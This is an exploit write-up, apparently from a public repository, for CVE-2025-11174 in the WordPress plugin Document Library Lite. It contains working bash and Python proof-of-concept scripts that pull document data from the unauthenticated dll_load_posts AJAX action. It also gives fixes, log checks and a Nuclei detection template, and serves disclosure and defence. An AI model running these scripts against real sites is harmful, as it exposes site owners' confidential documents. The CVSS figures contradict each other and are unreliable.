Exploit for CVE-2025-11174

Name: Exploit for CVE-2025-11174
Rating: 5 (313 reviews)
2025-11-02 | CVSS 5.3
## https://sploitus.com/exploit?id=56B8B940-87B7-55B9-8B2C-55731E2FC55A
# CVE-2025-11174: Unauthenticated Information Disclosure in WordPress Document Library Lite

## Overview

**CVE ID:** CVE-2025-11174  
**Severity:** Moderate  
**CVSS Score:** TBD  
**Published:** November 1, 2025  
**Vendor:** Barn2 Plugins  
**Product:** Document Library Lite (WordPress Plugin)  
**Affected Versions:** All versions up to and including 1.1.6  
**Fixed Version:** 1.1.7+

## Vulnerability Description

The Document Library Lite plugin for WordPress is vulnerable to **Improper Authorization** leading to **Unauthenticated Information Disclosure**. The vulnerability exists due to the plugin exposing an unauthenticated AJAX action `dll_load_posts` which returns a JSON table of document data without performing proper nonce or capability checks.

This allows any unauthenticated attacker to retrieve sensitive document information that should be restricted to authenticated users with appropriate permissions.

## Vulnerability Type

- CWE-862: Missing Authorization
- CWE-285: Improper Authorization

## Impact

An unauthenticated attacker can:
- Access sensitive document metadata
- Retrieve document listings without authentication
- Enumerate documents stored in the Document Library
- Potentially access confidential document information

### Attack Vector

- **Attack Vector (AV):** Network
- **Attack Complexity (AC):** Low
- **Privileges Required (PR):** None
- **User Interaction (UI):** None
- **Scope (S):** Unchanged
- **Confidentiality Impact (C):** High
- **Integrity Impact (I):** None
- **Availability Impact (A):** None

## Technical Details

### Vulnerable Endpoint

```
POST /wp-admin/admin-ajax.php
action=dll_load_posts
```

### Vulnerability Root Cause

The AJAX action `dll_load_posts` is registered without proper authentication or authorization checks:

```php
// Vulnerable code pattern (simplified)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
```

The `wp_ajax_nopriv_` prefix indicates this action is accessible to non-authenticated users, and the callback function does not implement:
- Nonce verification
- Capability checks
- User authentication validation

## Proof of Concept

⚠️ **For Educational Purposes Only**

```bash
#!/bin/bash
# CVE-2025-11174 PoC
# Usage: ./exploit.sh 

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 "
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"
```

### Python PoC

```python
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    """
    Exploit CVE-2025-11174 vulnerability
    """
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {
        'action': 'dll_load_posts'
    }
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} ")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)
```

## Mitigation

### For Site Administrators

1. **Update Immediately:** Upgrade Document Library Lite to version 1.1.7 or later
2. **Check Logs:** Review access logs for suspicious POST requests to `admin-ajax.php` with `action=dll_load_posts`
3. **Verify Installation:** Ensure the plugin is updated by checking WordPress admin panel

### Update Command (WP-CLI)

```bash
wp plugin update document-library-lite
```

### For Plugin Developers

The vulnerability can be fixed by:

1. Adding nonce verification:
```php
if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
    wp_die('Invalid nonce');
}
```

2. Adding capability checks:
```php
if (!current_user_can('read')) {
    wp_send_json_error('Insufficient permissions');
    wp_die();
}
```

3. Removing the `wp_ajax_nopriv_` hook or adding proper authentication

## Detection

### WordPress Plugin Check

```bash
# Check if vulnerable version is installed
wp plugin list | grep -i "document-library-lite"
```

### Security Scanner Rules

**Nuclei Template:**
```yaml
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-researcher
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
```

## Timeline

- **November 1, 2025** - CVE-2025-11174 published
- **November 1, 2025** - Vendor notified
- **November 2025** - Patch released (version 1.1.7)

## References

- [CVE-2025-11174 - CVE.org](https://vulners.com/cve/CVE-2025-11174)
- [GitHub Advisory Database](https://github.com/advisories/GHSA-cq4p-v24g-p55q)
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/id/2b73d48a-1f10-4e47-a18f-82a3103b72bd?source=cve)
- [WordPress Plugin Directory](https://wordpress.org/plugins/document-library-lite/)

## Credits

- Avraham Shemesh
- Kai Aizen [(SnailSploit)](Https://snailsploit.com)

## Disclaimer

This repository is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing any system.

## License

MIT License - See LICENSE file for details

---

**Note:** This vulnerability affects a specific WordPress plugin. Site administrators should update immediately to protect their installations.